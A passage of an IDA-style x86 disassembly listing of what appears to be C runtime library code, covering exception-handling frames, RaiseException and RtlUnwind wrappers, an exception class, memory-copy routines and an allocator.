; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
leave
retn 8
; =============== S U B R O U T I N E =======================================
sub_4236C4 proc near ; CODE XREF: sub_4297EE+199�p
; sub_4299B2+3E�p
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_4236C4 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4236CB proc near ; CODE XREF: sub_4297EE+17F�p
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_4236CB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4236D2 proc near ; CODE XREF: sub_423886+5C�p
; sub_42962E:loc_42965F�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
mov eax, large fs:0
mov [ebp+var_8], eax
mov [ebp+var_4], offset loc_4236FA
push 0
push [ebp+arg_4]
push [ebp+var_4]
push [ebp+arg_0]
call sub_42EBF2 ; RtlUnwind
loc_4236FA: ; DATA XREF: sub_4236D2+11�o
mov eax, [ebp+arg_4]
mov eax, [eax+4]
and al, 0FDh
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
mov eax, large fs:0
mov ebx, [ebp+var_8]
mov [ebx], eax
mov large fs:0, ebx
pop edi
pop esi
pop ebx
leave
retn 8
sub_4236D2 endp
; ---------------------------------------------------------------------------
loc_423721: ; CODE XREF: .text:0042EC05�j
; .text:0042EC38�j ...
push ebp
mov ebp, esp
sub esp, 4
push ebx
push esi
push edi
cld
mov [ebp-4], eax
xor eax, eax
push eax
push eax
push eax
push dword ptr [ebp-4]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_429225
add esp, 20h
mov [ebp+14h], eax
pop edi
pop esi
pop ebx
mov eax, [ebp+14h]
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423757 proc near ; CODE XREF: sub_4296A9+7B�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, [ebp+arg_4]
and [ebp+var_14], 0
mov ecx, [ebp+arg_0]
mov [ebp+var_C], eax
mov eax, [ebp+arg_C]
mov [ebp+var_10], offset sub_4237AB
inc eax
mov [ebp+var_8], ecx
mov [ebp+var_4], eax
mov eax, large fs:0
mov [ebp+var_14], eax
lea eax, [ebp+var_14]
mov large fs:0, eax
push [ebp+arg_10]
push ecx
push [ebp+arg_8]
call sub_429A40
mov ecx, eax
mov eax, [ebp+var_14]
mov large fs:0, eax
mov eax, ecx
leave
retn
sub_423757 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4237AB proc near ; DATA XREF: sub_423757+16�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cld
mov eax, [ebp+arg_4]
push 0
push eax
push dword ptr [eax+10h]
push dword ptr [eax+8]
push 0
push [ebp+arg_8]
push dword ptr [eax+0Ch]
push [ebp+arg_0]
call sub_429225
add esp, 20h
pop ebp
retn
sub_4237AB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4237D0 proc near ; CODE XREF: sub_429473+27�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
and [ebp+var_28], 0
mov [ebp+var_24], offset sub_423886
mov eax, [ebp+arg_10]
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
mov [ebp+var_1C], eax
mov eax, [ebp+arg_14]
mov [ebp+var_18], eax
mov eax, [ebp+arg_18]
mov [ebp+var_14], eax
and [ebp+var_10], 0
and [ebp+var_C], 0
and [ebp+var_8], 0
and [ebp+var_4], 0
mov [ebp+var_10], offset loc_423858
mov [ebp+var_C], esp
mov [ebp+var_8], ebp
mov eax, large fs:0
mov [ebp+var_28], eax
lea eax, [ebp+var_28]
mov large fs:0, eax
mov [ebp+var_34], 1
mov eax, [ebp+arg_0]
mov [ebp+var_30], eax
mov eax, [ebp+arg_8]
mov [ebp+var_2C], eax
lea eax, [ebp+var_30]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax]
call sub_42599D
call dword ptr [eax+68h]
pop ecx
pop ecx
and [ebp+var_34], 0
loc_423858: ; DATA XREF: sub_4237D0+3C�o
cmp [ebp+var_4], 0
jz short loc_423875
mov ebx, large fs:0
mov eax, [ebx]
mov ebx, [ebp+var_28]
mov [ebx], eax
mov large fs:0, ebx
jmp short loc_42387E
; ---------------------------------------------------------------------------
loc_423875: ; CODE XREF: sub_4237D0+8C�j
mov eax, [ebp+var_28]
mov large fs:0, eax
loc_42387E: ; CODE XREF: sub_4237D0+A3�j
mov eax, [ebp+var_34]
pop edi
pop esi
pop ebx
leave
retn
sub_4237D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423886 proc near ; DATA XREF: sub_4237D0+D�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
cld
mov eax, [ebp+arg_0]
mov eax, [eax+4]
and eax, 66h
test eax, eax
jz short loc_4238A9
mov eax, [ebp+arg_4]
mov dword ptr [eax+24h], 1
push 1
pop eax
jmp short loc_4238F6
; ---------------------------------------------------------------------------
loc_4238A9: ; CODE XREF: sub_423886+12�j
push 1
mov eax, [ebp+arg_4]
push dword ptr [eax+14h]
mov eax, [ebp+arg_4]
push dword ptr [eax+10h]
mov eax, [ebp+arg_4]
push dword ptr [eax+8]
push 0
push [ebp+arg_8]
mov eax, [ebp+arg_4]
push dword ptr [eax+0Ch]
push [ebp+arg_0]
call sub_429225
add esp, 20h
mov eax, [ebp+arg_4]
cmp dword ptr [eax+24h], 0
jnz short loc_4238E7
push [ebp+arg_0]
push [ebp+arg_4]
call sub_4236D2
loc_4238E7: ; CODE XREF: sub_423886+54�j
mov ebx, [ebp+arg_4]
mov esp, [ebx+1Ch]
mov ebp, [ebx+20h]
jmp dword ptr [ebx+18h]
; ---------------------------------------------------------------------------
push 1
pop eax
loc_4238F6: ; CODE XREF: sub_423886+21�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_423886 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4238FB proc near ; CODE XREF: sub_4292C0+D2�p
; sub_429473+45�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
cmp [ebp+arg_4], 0
push edi
mov edi, [ebp+arg_0]
mov esi, [edi+0Ch]
mov ebx, [edi+10h]
mov eax, esi
mov [ebp+arg_0], esi
mov [ebp+var_4], eax
jl short loc_423952
loc_423919: ; CODE XREF: sub_4238FB+52�j
cmp esi, 0FFFFFFFFh
jnz short loc_423923
call sub_429AED
loc_423923: ; CODE XREF: sub_4238FB+21�j
mov ecx, [ebp+arg_8]
dec esi
lea eax, [esi+esi*4]
cmp [ebx+eax*4+4], ecx
lea eax, [ebx+eax*4]
jge short loc_423938
cmp ecx, [eax+8]
jle short loc_42393D
loc_423938: ; CODE XREF: sub_4238FB+36�j
cmp esi, 0FFFFFFFFh
jnz short loc_423949
loc_42393D: ; CODE XREF: sub_4238FB+3B�j
mov eax, [ebp+arg_0]
dec [ebp+arg_4]
mov [ebp+var_4], eax
mov [ebp+arg_0], esi
loc_423949: ; CODE XREF: sub_4238FB+40�j
cmp [ebp+arg_4], 0
jge short loc_423919
mov eax, [ebp+var_4]
loc_423952: ; CODE XREF: sub_4238FB+1C�j
mov ecx, [ebp+arg_C]
inc esi
mov [ecx], esi
mov ecx, [ebp+arg_10]
mov [ecx], eax
cmp eax, [edi+0Ch]
ja short loc_423966
cmp esi, eax
jbe short loc_42396B
loc_423966: ; CODE XREF: sub_4238FB+65�j
call sub_429AED
loc_42396B: ; CODE XREF: sub_4238FB+69�j
lea eax, [esi+esi*4]
pop edi
pop esi
lea eax, [ebx+eax*4]
pop ebx
leave
retn
sub_4238FB endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423978 proc near ; CODE XREF: sub_424B30+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_423990
push [ebp+arg_0]
call sub_42EBF2 ; RtlUnwind
loc_423990: ; DATA XREF: sub_423978+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_423978 endp
; =============== S U B R O U T I N E =======================================
sub_423998 proc near ; DATA XREF: sub_4239BA+A�o
; sub_423A22+9�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_4239B9
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_4239B9: ; CODE XREF: sub_423998+10�j
retn
sub_423998 endp
; =============== S U B R O U T I N E =======================================
sub_4239BA proc near ; CODE XREF: sub_424B30+67�p
; sub_424B30+A7�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_423998
push large dword ptr fs:0
mov large fs:0, esp
loc_4239D7: ; CODE XREF: sub_4239BA:loc_423A12�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_423A14
cmp esi, [esp+1Ch+arg_4]
jz short loc_423A14
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_423A12
push 101h
mov eax, [ebx+esi*4+8]
call sub_423A4E
call dword ptr [ebx+esi*4+8]
loc_423A12: ; CODE XREF: sub_4239BA+44�j
jmp short loc_4239D7
; ---------------------------------------------------------------------------
loc_423A14: ; CODE XREF: sub_4239BA+2A�j
; sub_4239BA+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_4239BA endp
; =============== S U B R O U T I N E =======================================
sub_423A22 proc near ; CODE XREF: sub_429776+3F�p
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_423998
jnz short locret_423A44
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_423A44
mov eax, 1
locret_423A44: ; CODE XREF: sub_423A22+10�j
; sub_423A22+1B�j
retn
sub_423A22 endp
; =============== S U B R O U T I N E =======================================
sub_423A45 proc near ; CODE XREF: sub_429A40+1E�p
; sub_429A40+40�p
push ebx
push ecx
mov ebx, offset dword_4493E0
jmp short loc_423A58
sub_423A45 endp
; =============== S U B R O U T I N E =======================================
sub_423A4E proc near ; CODE XREF: sub_4239BA+4F�p
; sub_424B30+78�p
push ebx
push ecx
mov ebx, offset dword_4493E0
mov ecx, [ebp+8]
loc_423A58: ; CODE XREF: sub_423A45+7�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_423A4E endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_423A68 proc near ; CODE XREF: sub_40D75A+5�p
; sub_40D810+5�p ...
push 0FFFFFFFFh
push eax
mov eax, large fs:0
push eax
mov eax, [esp+0Ch]
mov large fs:0, esp
mov [esp+0Ch], ebp
lea ebp, [esp+0Ch]
push eax
retn
sub_423A68 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423A87 proc near ; CODE XREF: sub_40F0E1+54�p
; sub_40F351+18�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
push edi
push 8
pop ecx
mov esi, offset dword_42F3F0
lea edi, [ebp+var_20]
rep movsd
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
lea eax, [ebp+var_C]
push eax
push [ebp+var_10]
push [ebp+var_1C]
push [ebp+var_20]
call dword_42F1F8 ; RaiseException
pop edi
pop esi
leave
retn 8
sub_423A87 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423AD0 proc near ; CODE XREF: sub_40DA0E+C8�p
; sub_41FE93+28A�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
jecxz short loc_423B01
mov ebx, ecx
mov edi, [ebp+arg_0]
mov esi, edi
xor eax, eax
repne scasb
neg ecx
add ecx, ebx
mov edi, esi
mov esi, [ebp+arg_4]
repe cmpsb
mov al, [esi-1]
xor ecx, ecx
cmp al, [edi-1]
ja short loc_423AFF
jz short loc_423B01
dec ecx
dec ecx
loc_423AFF: ; CODE XREF: sub_423AD0+29�j
not ecx
loc_423B01: ; CODE XREF: sub_423AD0+9�j
; sub_423AD0+2B�j
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
sub_423AD0 endp
; =============== S U B R O U T I N E =======================================
sub_423B08 proc near ; DATA XREF: .text:off_42F414�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_423BAB
test [esp+4+arg_0], 1
jz short loc_423B1E
push esi
call sub_421C78
pop ecx
loc_423B1E: ; CODE XREF: sub_423B08+D�j
mov eax, esi
pop esi
retn 4
sub_423B08 endp
; =============== S U B R O U T I N E =======================================
sub_423B24 proc near ; CODE XREF: sub_40F1B0+1F�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
mov dword ptr [esi], offset off_42F414
push dword ptr [edi]
call sub_422120
inc eax
push eax
call sub_423F55
pop ecx
mov [esi+4], eax
test eax, eax
pop ecx
jz short loc_423B53
push dword ptr [edi]
push eax
call sub_423260
pop ecx
pop ecx
loc_423B53: ; CODE XREF: sub_423B24+23�j
mov dword ptr [esi+8], 1
mov eax, esi
pop edi
pop esi
retn 4
sub_423B24 endp
; =============== S U B R O U T I N E =======================================
sub_423B61 proc near ; CODE XREF: sub_40F389+17�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
mov dword ptr [esi], offset off_42F414
mov eax, [edi+8]
test eax, eax
mov [esi+8], eax
jz short loc_423B9E
push dword ptr [edi+4]
call sub_422120
inc eax
push eax
call sub_423F55
pop ecx
mov [esi+4], eax
test eax, eax
pop ecx
jz short loc_423BA4
push dword ptr [edi+4]
push eax
call sub_423260
pop ecx
pop ecx
jmp short loc_423BA4
; ---------------------------------------------------------------------------
loc_423B9E: ; CODE XREF: sub_423B61+16�j
mov eax, [edi+4]
mov [esi+4], eax
loc_423BA4: ; CODE XREF: sub_423B61+2E�j
; sub_423B61+3B�j
mov eax, esi
pop edi
pop esi
retn 4
sub_423B61 endp
; =============== S U B R O U T I N E =======================================
sub_423BAB proc near ; CODE XREF: sub_40F36E+16�j
; sub_421CDD+2B�p ...
cmp dword ptr [ecx+8], 0
mov dword ptr [ecx], offset off_42F414
jz short locret_423BC0
push dword ptr [ecx+4]
call sub_421C78
pop ecx
locret_423BC0: ; CODE XREF: sub_423BAB+A�j
retn
sub_423BAB endp
; =============== S U B R O U T I N E =======================================
sub_423BC1 proc near ; DATA XREF: .text:0042F418�o
mov eax, [ecx+4]
test eax, eax
jnz short locret_423BCD
mov eax, offset aUnknownExcepti ; "Unknown exception"
locret_423BCD: ; CODE XREF: sub_423BC1+5�j
retn
sub_423BC1 endp
; =============== S U B R O U T I N E =======================================
sub_423BCE proc near ; CODE XREF: .text:00423BFA�p
push esi
mov esi, ecx
push 1Bh
mov dword ptr [esi], offset off_42F434
call sub_428436
mov esi, [esi+4]
pop ecx
test esi, esi
jz short loc_423BED
push esi
call sub_4230B3
pop ecx
loc_423BED: ; CODE XREF: sub_423BCE+16�j
push 1Bh
call sub_428497
pop ecx
pop esi
retn
sub_423BCE endp
; ---------------------------------------------------------------------------
loc_423BF7: ; DATA XREF: .text:off_42F434�o
push esi
mov esi, ecx
call sub_423BCE
test byte ptr [esp+8], 1
jz short loc_423C0D
push esi
call sub_421C78
pop ecx
loc_423C0D: ; CODE XREF: .text:00423C04�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423C20 proc near ; CODE XREF: sub_40F2DD+3A�p
; sub_42726C+2EF�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_423C40
cmp edi, eax
jb loc_423DB8
loc_423C40: ; CODE XREF: sub_423C20+16�j
test edi, 3
jnz short loc_423C5C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_423C7C
rep movsd
jmp off_423D68[edx*4]
; ---------------------------------------------------------------------------
loc_423C5C: ; CODE XREF: sub_423C20+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_423C74
and eax, 3
add ecx, eax
jmp dword ptr loc_423C7C+4[eax*4]
; ---------------------------------------------------------------------------
loc_423C74: ; CODE XREF: sub_423C20+46�j
jmp dword ptr loc_423D78[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_423C7C: ; CODE XREF: sub_423C20+31�j
; sub_423C20+8E�j ...
jmp off_423CFC[ecx*4]
; ---------------------------------------------------------------------------
db 2 dup(90h)
db 3Ch, 42h, 0
dd offset loc_423CBC
dd offset loc_423CE0
; ---------------------------------------------------------------------------
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_423C7C
rep movsd
jmp off_423D68[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_423CBC: ; DATA XREF: sub_423C20+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_423C7C
rep movsd
jmp off_423D68[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_423CE0: ; DATA XREF: sub_423C20+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_423C7C
rep movsd
jmp off_423D68[edx*4]
; ---------------------------------------------------------------------------
align 4
off_423CFC dd offset loc_423D5F ; DATA XREF: sub_423C20:loc_423C7C�r
dd offset loc_423D4C
dd offset loc_423D44
dd offset loc_423D3C
dd offset loc_423D34
dd offset loc_423D2C
dd offset loc_423D24
dd offset loc_423D1C
; ---------------------------------------------------------------------------
loc_423D1C: ; CODE XREF: sub_423C20:loc_423C7C�j
; DATA XREF: sub_423C20+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_423D24: ; CODE XREF: sub_423C20:loc_423C7C�j
; DATA XREF: sub_423C20+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_423D2C: ; CODE XREF: sub_423C20:loc_423C7C�j
; DATA XREF: sub_423C20+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_423D34: ; CODE XREF: sub_423C20:loc_423C7C�j
; DATA XREF: sub_423C20+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_423D3C: ; CODE XREF: sub_423C20:loc_423C7C�j
; DATA XREF: sub_423C20+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_423D44: ; CODE XREF: sub_423C20:loc_423C7C�j
; DATA XREF: sub_423C20+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_423D4C: ; CODE XREF: sub_423C20:loc_423C7C�j
; DATA XREF: sub_423C20+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_423D5F: ; CODE XREF: sub_423C20:loc_423C7C�j
; DATA XREF: sub_423C20:off_423CFC�o
jmp off_423D68[edx*4]
; ---------------------------------------------------------------------------
align 4
off_423D68 dd offset loc_423D78 ; DATA XREF: sub_423C20+35�r
; sub_423C20+92�r ...
dd offset loc_423D80
dd offset loc_423D8C
dd offset loc_423DA0
; ---------------------------------------------------------------------------
loc_423D78: ; CODE XREF: sub_423C20+35�j
; sub_423C20+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_423D80: ; CODE XREF: sub_423C20+35�j
; sub_423C20+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_423D8C: ; CODE XREF: sub_423C20+35�j
; sub_423C20+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_423DA0: ; CODE XREF: sub_423C20+35�j
; sub_423C20+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_423DB8: ; CODE XREF: sub_423C20+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_423DEC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_423DE0
std
rep movsd
cld
jmp off_423F00[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_423DE0: ; CODE XREF: sub_423C20+1B1�j
; sub_423C20+208�j ...
neg ecx
jmp off_423EB0[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_423DEC: ; CODE XREF: sub_423C20+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_423E04
and eax, 3
sub ecx, eax
jmp dword ptr loc_423E04+4[eax*4]
; ---------------------------------------------------------------------------
loc_423E04: ; CODE XREF: sub_423C20+1D6�j
; DATA XREF: sub_423C20+1DD�r
jmp off_423F00[ecx*4]
; ---------------------------------------------------------------------------
align 4
sbb [esi], bh
inc edx
add [eax], bh
db 3Eh
inc edx
add [eax+3Eh], ah
inc edx
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_423DE0
std
rep movsd
cld
jmp off_423F00[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_423DE0
std
rep movsd
cld
jmp off_423F00[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_423DE0
std
rep movsd
cld
jmp off_423F00[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_423EB4
dd offset loc_423EBC
dd offset loc_423EC4
dd offset loc_423ECC
dd offset loc_423ED4
dd offset loc_423EDC
dd offset loc_423EE4
off_423EB0 dd offset loc_423EF7 ; DATA XREF: sub_423C20+1C2�r
; ---------------------------------------------------------------------------
loc_423EB4: ; DATA XREF: sub_423C20+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_423EBC: ; DATA XREF: sub_423C20+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_423EC4: ; DATA XREF: sub_423C20+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_423ECC: ; DATA XREF: sub_423C20+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_423ED4: ; DATA XREF: sub_423C20+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_423EDC: ; DATA XREF: sub_423C20+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_423EE4: ; DATA XREF: sub_423C20+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_423EF7: ; CODE XREF: sub_423C20+1C2�j
; DATA XREF: sub_423C20:off_423EB0�o
jmp off_423F00[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_423F00 dd offset loc_423F10 ; DATA XREF: sub_423C20+1B7�r
; sub_423C20:loc_423E04�r ...
dd offset loc_423F18
dd offset loc_423F28
dd offset loc_423F3C
; ---------------------------------------------------------------------------
loc_423F10: ; CODE XREF: sub_423C20+1B7�j
; sub_423C20:loc_423E04�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_423F18: ; CODE XREF: sub_423C20+1B7�j
; sub_423C20:loc_423E04�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_423F28: ; CODE XREF: sub_423C20+1B7�j
; sub_423C20:loc_423E04�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_423F3C: ; CODE XREF: sub_423C20+1B7�j
; sub_423C20:loc_423E04�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_423C20 endp
; =============== S U B R O U T I N E =======================================
sub_423F55 proc near ; CODE XREF: sub_40F467+4F�p
; sub_40F66B+34�p ...
arg_0 = dword ptr 4
push 1
push [esp+4+arg_0]
call sub_422F8B
pop ecx
pop ecx
retn
sub_423F55 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423F63 proc near ; CODE XREF: sub_40F770+145�p
; sub_41CDE4+5�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 00424005 SIZE 0000007B BYTES
; FUNCTION CHUNK AT 0042408E SIZE 00000012 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_42F438
push offset sub_424B30
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
imul esi, [ebp+arg_4]
mov [ebp+arg_4], esi
mov [ebp+var_1C], esi
cmp esi, 0FFFFFFE0h
ja short loc_423FAC
xor ebx, ebx
cmp esi, ebx
jnz short loc_423FA1
push 1
pop esi
loc_423FA1: ; CODE XREF: sub_423F63+39�j
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
jmp short loc_423FAE
; ---------------------------------------------------------------------------
loc_423FAC: ; CODE XREF: sub_423F63+33�j
xor ebx, ebx
loc_423FAE: ; CODE XREF: sub_423F63+47�j
; sub_423F63+115�j
mov [ebp+var_20], ebx
cmp esi, 0FFFFFFE0h
ja loc_424062
mov eax, dword_6319C0
cmp eax, 3
jnz short loc_424005
mov edi, [ebp+var_1C]
cmp edi, dword_6319B8
ja short loc_42404B
push 9
call sub_428436
pop ecx
mov [ebp+var_4], ebx
push edi
call sub_427595
pop ecx
mov [ebp+var_20], eax
or [ebp+var_4], 0FFFFFFFFh
call sub_423FFC
cmp [ebp+var_20], ebx
jz short loc_424050
push [ebp+var_1C]
jmp short loc_42403F
sub_423F63 endp
; =============== S U B R O U T I N E =======================================
sub_423FF7 proc near ; DATA XREF: .text:0042F440�o
